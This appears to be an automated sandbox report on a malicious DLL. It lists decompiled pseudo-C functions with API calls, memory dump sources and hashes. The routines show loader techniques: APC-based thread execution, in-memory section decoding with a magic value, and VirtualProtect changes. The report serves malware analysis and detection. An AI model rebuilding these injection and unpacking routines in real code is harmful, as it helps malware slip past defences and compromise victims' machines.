                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2110400756-0
                                                                                                                • Opcode ID: bca6fee3ce43a11feb739504a49e0c8c61267433eb95841d85069fc9adb39e5a
                                                                                                                • Instruction ID: c2c7a6e1888d56ccc0dd1b1f2188b7fea01fc98ed7b379a8327be68e7e829dc6
                                                                                                                • Opcode Fuzzy Hash: bca6fee3ce43a11feb739504a49e0c8c61267433eb95841d85069fc9adb39e5a
                                                                                                                • Instruction Fuzzy Hash: 8521A4B1704605EFCB019FE9DD8C94A3BF8FB663617108529E416E2102D330998BBFD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F155C(long _a4, DWORD* _a12) {
                                                                                                                				_Unknown_base(*)()* _v0;
                                                                                                                				void* _t4;
                                                                                                                				long _t6;
                                                                                                                				long _t11;
                                                                                                                				void* _t13;
                                                                                                                
                                                                                                                				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1f4140, 0, _a12); // executed
                                                                                                                				_t13 = _t4;
                                                                                                                				if(_t13 != 0) {
                                                                                                                					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                					if(_t6 == 0) {
                                                                                                                						_t11 = GetLastError();
                                                                                                                						TerminateThread(_t13, _t11);
                                                                                                                						CloseHandle(_t13);
                                                                                                                						_t13 = 0;
                                                                                                                						SetLastError(_t11);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t13;
                                                                                                                			}








                                                                                                                0x6e1f1573
                                                                                                                0x6e1f1579
                                                                                                                0x6e1f157d
                                                                                                                0x6e1f1588
                                                                                                                0x6e1f1590
                                                                                                                0x6e1f1599
                                                                                                                0x6e1f159d
                                                                                                                0x6e1f15a4
                                                                                                                0x6e1f15ab
                                                                                                                0x6e1f15ad
                                                                                                                0x6e1f15b3
                                                                                                                0x6e1f1590
                                                                                                                0x6e1f15b7

                                                                                                                APIs
                                                                                                                • CreateThread.KERNELBASE ref: 6E1F1573
                                                                                                                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1F1588
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 6E1F1593
                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 6E1F159D
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6E1F15A4
                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6E1F15AD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 3832013932-0
                                                                                                                • Opcode ID: c9bcf2240564073cbc6a965df18956419aa53106e2318db64b2f812bc7574846
                                                                                                                • Instruction ID: 4e75fb8dca12f187ac41966a7ad18cb48a73339653327eb24a22f0a86bbc8f56
                                                                                                                • Opcode Fuzzy Hash: c9bcf2240564073cbc6a965df18956419aa53106e2318db64b2f812bc7574846
                                                                                                                • Instruction Fuzzy Hash: 42F05472204A10FBDB225BA0AC0CF5EBFE4FB1A701F008405F50791150C7218502BBE6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E6E1F1717(void* __edi, intOrPtr _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				void* _v16;
                                                                                                                				unsigned int _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				char _v28;
                                                                                                                				signed int _v32;
                                                                                                                				void* _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed char _v44;
                                                                                                                				void* _v48;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				intOrPtr _t50;
                                                                                                                				void* _t57;
                                                                                                                				void* _t61;
                                                                                                                				signed int _t67;
                                                                                                                				signed char _t69;
                                                                                                                				signed char _t70;
                                                                                                                				void* _t76;
                                                                                                                				intOrPtr _t77;
                                                                                                                				unsigned int _t82;
                                                                                                                				intOrPtr _t86;
                                                                                                                				intOrPtr* _t89;
                                                                                                                				intOrPtr _t90;
                                                                                                                				void* _t91;
                                                                                                                				signed int _t93;
                                                                                                                
                                                                                                                				_t90 =  *0x6e1f4130;
                                                                                                                				_t50 = E6E1F193C(_t90,  &_v28,  &_v20);
                                                                                                                				_v24 = _t50;
                                                                                                                				if(_t50 == 0) {
                                                                                                                					asm("sbb ebx, ebx");
                                                                                                                					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
                                                                                                                					_t91 = _t90 + _v28;
                                                                                                                					_v48 = _t91;
                                                                                                                					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
                                                                                                                					_t76 = _t57;
                                                                                                                					_v36 = _t76;
                                                                                                                					if(_t76 == 0) {
                                                                                                                						_v24 = 8;
                                                                                                                					} else {
                                                                                                                						_t69 = 0;
                                                                                                                						if(_t67 <= 0) {
                                                                                                                							_t77 =  *0x6e1f4140;
                                                                                                                						} else {
                                                                                                                							_t86 = _a4;
                                                                                                                							_v8 = _t91;
                                                                                                                							_v8 = _v8 - _t76;
                                                                                                                							_t14 = _t86 + 0x6e1f51a7; // 0x3220a9c2
                                                                                                                							_t61 = _t57 - _t91 + _t14;
                                                                                                                							_v16 = _t76;
                                                                                                                							do {
                                                                                                                								asm("movsd");
                                                                                                                								asm("movsd");
                                                                                                                								asm("movsd");
                                                                                                                								_t70 = _t69 + 1;
                                                                                                                								_v44 = _t70;
                                                                                                                								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
                                                                                                                								if(_t82 != 0) {
                                                                                                                									_v32 = _v32 & 0x00000000;
                                                                                                                									_t89 = _v16;
                                                                                                                									_v12 = 0x400;
                                                                                                                									do {
                                                                                                                										_t93 =  *((intOrPtr*)(_v8 + _t89));
                                                                                                                										_v40 = _t93;
                                                                                                                										if(_t93 == 0) {
                                                                                                                											_v12 = 1;
                                                                                                                										} else {
                                                                                                                											 *_t89 = _t93 + _v32 - _t82;
                                                                                                                											_v32 = _v40;
                                                                                                                											_t89 = _t89 + 4;
                                                                                                                										}
                                                                                                                										_t33 =  &_v12;
                                                                                                                										 *_t33 = _v12 - 1;
                                                                                                                									} while ( *_t33 != 0);
                                                                                                                								}
                                                                                                                								_t69 = _v44;
                                                                                                                								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
                                                                                                                								_v16 = _v16 + 0x1000;
                                                                                                                								 *0x6e1f4140 = _t77;
                                                                                                                							} while (_t69 < _t67);
                                                                                                                						}
                                                                                                                						if(_t77 != 0x63699bc3) {
                                                                                                                							_v24 = 0xc;
                                                                                                                						} else {
                                                                                                                							memcpy(_v48, _v36, _v20);
                                                                                                                						}
                                                                                                                						VirtualFree(_v36, 0, 0x8000); // executed
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _v24;
                                                                                                                			}






























                                                                                                                0x6e1f171e
                                                                                                                0x6e1f172e
                                                                                                                0x6e1f1733
                                                                                                                0x6e1f1738
                                                                                                                0x6e1f174d
                                                                                                                0x6e1f1754
                                                                                                                0x6e1f1759
                                                                                                                0x6e1f176a
                                                                                                                0x6e1f176d
                                                                                                                0x6e1f1773
                                                                                                                0x6e1f1775
                                                                                                                0x6e1f177a
                                                                                                                0x6e1f1856
                                                                                                                0x6e1f1780
                                                                                                                0x6e1f1780
                                                                                                                0x6e1f1784
                                                                                                                0x6e1f181c
                                                                                                                0x6e1f178a
                                                                                                                0x6e1f178b
                                                                                                                0x6e1f1790
                                                                                                                0x6e1f1793
                                                                                                                0x6e1f1796
                                                                                                                0x6e1f1796
                                                                                                                0x6e1f179d
                                                                                                                0x6e1f17a0
                                                                                                                0x6e1f17a8
                                                                                                                0x6e1f17a9
                                                                                                                0x6e1f17aa
                                                                                                                0x6e1f17b1
                                                                                                                0x6e1f17b5
                                                                                                                0x6e1f17bb
                                                                                                                0x6e1f17bf
                                                                                                                0x6e1f17c1
                                                                                                                0x6e1f17c5
                                                                                                                0x6e1f17c8
                                                                                                                0x6e1f17cf
                                                                                                                0x6e1f17d2
                                                                                                                0x6e1f17d5
                                                                                                                0x6e1f17da
                                                                                                                0x6e1f17f0
                                                                                                                0x6e1f17dc
                                                                                                                0x6e1f17e6
                                                                                                                0x6e1f17e8
                                                                                                                0x6e1f17eb
                                                                                                                0x6e1f17eb
                                                                                                                0x6e1f17f7
                                                                                                                0x6e1f17f7
                                                                                                                0x6e1f17f7
                                                                                                                0x6e1f17cf
                                                                                                                0x6e1f1802
                                                                                                                0x6e1f1805
                                                                                                                0x6e1f1808
                                                                                                                0x6e1f180f
                                                                                                                0x6e1f1815
                                                                                                                0x6e1f1819
                                                                                                                0x6e1f1828
                                                                                                                0x6e1f183d
                                                                                                                0x6e1f182a
                                                                                                                0x6e1f1833
                                                                                                                0x6e1f1838
                                                                                                                0x6e1f184e
                                                                                                                0x6e1f184e
                                                                                                                0x6e1f185d
                                                                                                                0x6e1f1863

                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1F176D
                                                                                                                • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1F1833
                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E1F184E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$AllocFreememcpy
                                                                                                                • String ID: Jun 9 2021
                                                                                                                • API String ID: 4010158826-3443083063
                                                                                                                • Opcode ID: c577948e1af57871e4c0e89096b924300f29d2e380ac080f4b478f74f7362b1a
                                                                                                                • Instruction ID: fd0c265d1e830dea2869a0a5579e080fbcf90ad85ecf40f0def1ef883ebbee37
                                                                                                                • Opcode Fuzzy Hash: c577948e1af57871e4c0e89096b924300f29d2e380ac080f4b478f74f7362b1a
                                                                                                                • Instruction Fuzzy Hash: 55418AB1E0020ADFDB00CF98C980ADEBBF6BF48310F248169D90577245C775A98ADBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E6E1F15EA(void* __ecx, char _a4) {
                                                                                                                				long _t3;
                                                                                                                				int _t4;
                                                                                                                				int _t9;
                                                                                                                				void* _t13;
                                                                                                                
                                                                                                                				_t13 = GetCurrentThread();
                                                                                                                				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                				if(_t3 != 0) {
                                                                                                                					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                				}
                                                                                                                				_t4 = E6E1F1456(_a4); // executed
                                                                                                                				_t9 = _t4;
                                                                                                                				if(_t9 == 0) {
                                                                                                                					SetThreadPriority(_t13, _t4);
                                                                                                                				}
                                                                                                                				asm("lock xadd [eax], ecx");
                                                                                                                				return _t9;
                                                                                                                			}







                                                                                                                0x6e1f15f3
                                                                                                                0x6e1f15f8
                                                                                                                0x6e1f1606
                                                                                                                0x6e1f160b
                                                                                                                0x6e1f160b
                                                                                                                0x6e1f1611
                                                                                                                0x6e1f1616
                                                                                                                0x6e1f161a
                                                                                                                0x6e1f161e
                                                                                                                0x6e1f161e
                                                                                                                0x6e1f1628
                                                                                                                0x6e1f1631

                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 6E1F15ED
                                                                                                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1F15F8
                                                                                                                • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1F160B
                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1F161E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                • String ID:
                                                                                                                • API String ID: 1452675757-0
                                                                                                                • Opcode ID: b51dd97a93a73309d43197691dbc6f2a46740508525a80a3de8e44a2c7a6f377
                                                                                                                • Instruction ID: a68c8bba6e6a0cb40b49a1de60ba2b01cd06b5c7e9dd89a06e82043099f1af5f
                                                                                                                • Opcode Fuzzy Hash: b51dd97a93a73309d43197691dbc6f2a46740508525a80a3de8e44a2c7a6f377
                                                                                                                • Instruction Fuzzy Hash: A4E02B70306611ABA6011A695C48E5F77ECDFD23707114336F431D21C0CB50CC07A5F9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E6E1F1020(void* __eax, void* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				long _v20;
                                                                                                                				int _t43;
                                                                                                                				long _t54;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t58;
                                                                                                                				signed int _t60;
                                                                                                                
                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                				_t57 =  *0x6e1f4140;
                                                                                                                				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				if(_v16 <= 0) {
                                                                                                                					L12:
                                                                                                                					return _v12;
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t60 = _v12;
                                                                                                                					if(_t60 != 0) {
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					asm("bt [esi+0x24], eax");
                                                                                                                					if(_t60 >= 0) {
                                                                                                                						asm("bt [esi+0x24], eax");
                                                                                                                						if(__eflags >= 0) {
                                                                                                                							L8:
                                                                                                                							_t54 = _t57 - 0x63699bbf;
                                                                                                                							L9:
                                                                                                                							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                							if(_t43 == 0) {
                                                                                                                								_v12 = GetLastError();
                                                                                                                							}
                                                                                                                							_v8 = _v8 + 1;
                                                                                                                							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                                                                                							if(_v8 < _v16) {
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								goto L12;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						asm("bt [esi+0x24], eax");
                                                                                                                						_t54 = _t57 - 0x63699bc1;
                                                                                                                						if(__eflags >= 0) {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					asm("bt [esi+0x24], eax");
                                                                                                                					if(_t60 >= 0) {
                                                                                                                						_t54 = _t57 - 0x63699ba3;
                                                                                                                					} else {
                                                                                                                						_t54 = _t57 - 0x63699b83;
                                                                                                                					}
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				goto L12;
                                                                                                                			}












                                                                                                                0x6e1f102a
                                                                                                                0x6e1f1037
                                                                                                                0x6e1f103d
                                                                                                                0x6e1f1049
                                                                                                                0x6e1f1059
                                                                                                                0x6e1f105b
                                                                                                                0x6e1f1063
                                                                                                                0x6e1f10f8
                                                                                                                0x6e1f10ff
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1069
                                                                                                                0x6e1f1069
                                                                                                                0x6e1f1069
                                                                                                                0x6e1f106d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1079
                                                                                                                0x6e1f107d
                                                                                                                0x6e1f10a1
                                                                                                                0x6e1f10a5
                                                                                                                0x6e1f10b9
                                                                                                                0x6e1f10b9
                                                                                                                0x6e1f10bf
                                                                                                                0x6e1f10ce
                                                                                                                0x6e1f10d2
                                                                                                                0x6e1f10da
                                                                                                                0x6e1f10da
                                                                                                                0x6e1f10e2
                                                                                                                0x6e1f10e5
                                                                                                                0x6e1f10f2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f10f2
                                                                                                                0x6e1f10ad
                                                                                                                0x6e1f10b1
                                                                                                                0x6e1f10b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f10b7
                                                                                                                0x6e1f1085
                                                                                                                0x6e1f1089
                                                                                                                0x6e1f1093
                                                                                                                0x6e1f108b
                                                                                                                0x6e1f108b
                                                                                                                0x6e1f108b
                                                                                                                0x00000000
                                                                                                                0x6e1f1089
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E1F1059
                                                                                                                • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1F10CE
                                                                                                                • GetLastError.KERNEL32 ref: 6E1F10D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1469625949-0
                                                                                                                • Opcode ID: c0b71fe61ab5b4792f1e74ea67d8fb80ada1c428db44b23affd6759674906cf4
                                                                                                                • Instruction ID: 241d61fc6db792dcb840a96dc90f1fc4adf6be30e25c22212b1815c50bf6002e
                                                                                                                • Opcode Fuzzy Hash: c0b71fe61ab5b4792f1e74ea67d8fb80ada1c428db44b23affd6759674906cf4
                                                                                                                • Instruction Fuzzy Hash: C7217171A0020ADFCB14CFD5C491EAEF7F5FF04319F10495AD10297582E3B8A69AEB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: _wcsnlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3628947076-0
                                                                                                                • Opcode ID: 547b4981ad83a839f0a0642563ba5a7b10b9bbb1ad57b171e549af9197ce6d1f
                                                                                                                • Instruction ID: 81d51be14bb3fe7245b613e34bdaee71105ab9a5d6628b407fc8aca9cca0b6f1
                                                                                                                • Opcode Fuzzy Hash: 547b4981ad83a839f0a0642563ba5a7b10b9bbb1ad57b171e549af9197ce6d1f
                                                                                                                • Instruction Fuzzy Hash: F6F024765A860D6FF7408AF4AC44BAF33AFCB843A5F608835FA08C5058FA39C5604291
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::ios_base::_Init.LIBCPMT ref: 6E21A534
                                                                                                                  • Part of subcall function 6E21A074: std::ios_base::clear.LIBCPMTD ref: 6E21A0A3
                                                                                                                  • Part of subcall function 6E21A074: std::locale::_Init.LIBCPMT ref: 6E21A0B8
                                                                                                                  • Part of subcall function 6E21AC30: __EH_prolog3.LIBCMT ref: 6E21AC37
                                                                                                                  • Part of subcall function 6E21AC30: std::ios_base::getloc.LIBCPMTD ref: 6E21AC40
                                                                                                                • std::ios_base::clear.LIBCPMTD ref: 6E21A561
                                                                                                                • std::ios_base::_Addstd.LIBCPMT ref: 6E21A56D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Initstd::ios_base::_std::ios_base::clear$AddstdH_prolog3std::ios_base::getlocstd::locale::_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3327797918-0
                                                                                                                • Opcode ID: 75a706e45bd50f0c9afe3102ab609f860f4f84a39c4ba575d6882af7320c9f9c
                                                                                                                • Instruction ID: 3330ee9492993e81e3f88d9e352fdb69f91a0e885b1242d823e0163c6e2bf69b
                                                                                                                • Opcode Fuzzy Hash: 75a706e45bd50f0c9afe3102ab609f860f4f84a39c4ba575d6882af7320c9f9c
                                                                                                                • Instruction Fuzzy Hash: 63F0E57550C31867DB20DAF0D440BC777E9AF01239F00481EE68257A80DBB5F7448794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F1E55() {
                                                                                                                				char _v16;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void _v32;
                                                                                                                				void* _v36;
                                                                                                                				intOrPtr _t15;
                                                                                                                				void* _t16;
                                                                                                                				long _t25;
                                                                                                                				int _t26;
                                                                                                                				void* _t30;
                                                                                                                				intOrPtr* _t32;
                                                                                                                				signed int _t36;
                                                                                                                				intOrPtr _t39;
                                                                                                                
                                                                                                                				_t15 =  *0x6e1f4144;
                                                                                                                				if( *0x6e1f412c > 5) {
                                                                                                                					_t16 = _t15 + 0x6e1f50f9;
                                                                                                                				} else {
                                                                                                                					_t16 = _t15 + 0x6e1f50b1;
                                                                                                                				}
                                                                                                                				E6E1F16F1(_t16, _t16);
                                                                                                                				_t36 = 6;
                                                                                                                				memset( &_v32, 0, _t36 << 2);
                                                                                                                				if(E6E1F132A( &_v32,  &_v16,  *0x6e1f4140 ^ 0xfd7cd1cf) == 0) {
                                                                                                                					_t25 = 0xb;
                                                                                                                				} else {
                                                                                                                					_t26 = lstrlenW( *0x6e1f4138);
                                                                                                                					_t8 = _t26 + 2; // 0x2
                                                                                                                					_t11 = _t26 + _t8 + 8; // 0xa
                                                                                                                					_t30 = E6E1F1ADA(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                					if(_t30 == 0) {
                                                                                                                						_t32 = _v36;
                                                                                                                						 *_t32 = 0;
                                                                                                                						if( *0x6e1f4138 == 0) {
                                                                                                                							 *((short*)(_t32 + 4)) = 0;
                                                                                                                						} else {
                                                                                                                							E6E1F2033(_t44, _t32 + 4);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t25 = E6E1F1634(_v28); // executed
                                                                                                                				}
                                                                                                                				ExitThread(_t25);
                                                                                                                			}















                                                                                                                0x6e1f1e5b
                                                                                                                0x6e1f1e6c
                                                                                                                0x6e1f1e76
                                                                                                                0x6e1f1e6e
                                                                                                                0x6e1f1e6e
                                                                                                                0x6e1f1e6e
                                                                                                                0x6e1f1e7d
                                                                                                                0x6e1f1e86
                                                                                                                0x6e1f1e8b
                                                                                                                0x6e1f1ea9
                                                                                                                0x6e1f1f05
                                                                                                                0x6e1f1eab
                                                                                                                0x6e1f1eb1
                                                                                                                0x6e1f1eb7
                                                                                                                0x6e1f1ec5
                                                                                                                0x6e1f1ec9
                                                                                                                0x6e1f1ed0
                                                                                                                0x6e1f1ed9
                                                                                                                0x6e1f1edd
                                                                                                                0x6e1f1ee3
                                                                                                                0x6e1f1ef4
                                                                                                                0x6e1f1ee5
                                                                                                                0x6e1f1eeb
                                                                                                                0x6e1f1eeb
                                                                                                                0x6e1f1ee3
                                                                                                                0x6e1f1efc
                                                                                                                0x6e1f1efc
                                                                                                                0x6e1f1f07

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ExitThreadlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2636182767-0
                                                                                                                • Opcode ID: 636156006ad67301b9c360a24081a80f7032d8b2cab0a876dff6d298715e738c
                                                                                                                • Instruction ID: fbfcda620af3e26654208acccd71c21efc10d398ae5c01b92782ec6c07fca627
                                                                                                                • Opcode Fuzzy Hash: 636156006ad67301b9c360a24081a80f7032d8b2cab0a876dff6d298715e738c
                                                                                                                • Instruction Fuzzy Hash: 5211E2B2208606DFEB11DBA5D858E8B77ECAF16304F018816F055D3152EB30E58BEBD2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6E21AC37
                                                                                                                • std::ios_base::getloc.LIBCPMTD ref: 6E21AC40
                                                                                                                  • Part of subcall function 6E2188A0: std::locale::locale.LIBCPMTD ref: 6E2188BA
                                                                                                                  • Part of subcall function 6E213020: std::_Lockit::_Lockit.LIBCPMT ref: 6E21304A
                                                                                                                  • Part of subcall function 6E213020: int.LIBCPMTD ref: 6E213063
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3LockitLockit::_std::_std::ios_base::getlocstd::locale::locale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2499403736-0
                                                                                                                • Opcode ID: e888777f6277678fc5c68fadb465dc4156e5c2648d869fee271b694a9f0e48be
                                                                                                                • Instruction ID: f3ee4eb4a4d9258048ef50bc18238b46457d66eaec120d25bff295a46532d5df
                                                                                                                • Opcode Fuzzy Hash: e888777f6277678fc5c68fadb465dc4156e5c2648d869fee271b694a9f0e48be
                                                                                                                • Instruction Fuzzy Hash: D0E01AB590821DDBCB18EBE4C808AEEBBAABF20625F6049189621571D0CB704B01CA90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetUserDefaultLCID.KERNEL32(00000055,?,?,6E22E723,?,00000055,0000009C), ref: 6E222AA4
                                                                                                                • ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 6E222AAB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DefaultDownlevelLocaleNameUser___crt
                                                                                                                • String ID:
                                                                                                                • API String ID: 395733334-0
                                                                                                                • Opcode ID: c9ff482c29f6f8456e3c34089fc1f673382ff359eaa3bd6c59e21c965edd2f47
                                                                                                                • Instruction ID: 0823adf91fb090f3f9cfb7e9b20a01ecbde8d1496a5547f6d4669a1b1526c155
                                                                                                                • Opcode Fuzzy Hash: c9ff482c29f6f8456e3c34089fc1f673382ff359eaa3bd6c59e21c965edd2f47
                                                                                                                • Instruction Fuzzy Hash: CBD0C9B741450EAFCF00ABE4EC0986A3BAEBF59714B444450F91C87511D637B160DBB2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E6E1F16F1(void* __eax, intOrPtr _a4) {
                                                                                                                
                                                                                                                				 *0x6e1f4150 =  *0x6e1f4150 & 0x00000000;
                                                                                                                				_push(0);
                                                                                                                				_push(0x6e1f414c);
                                                                                                                				_push(1);
                                                                                                                				_push(_a4);
                                                                                                                				 *0x6e1f4148 = 0xc; // executed
                                                                                                                				L6E1F1A3E(); // executed
                                                                                                                				return __eax;
                                                                                                                			}



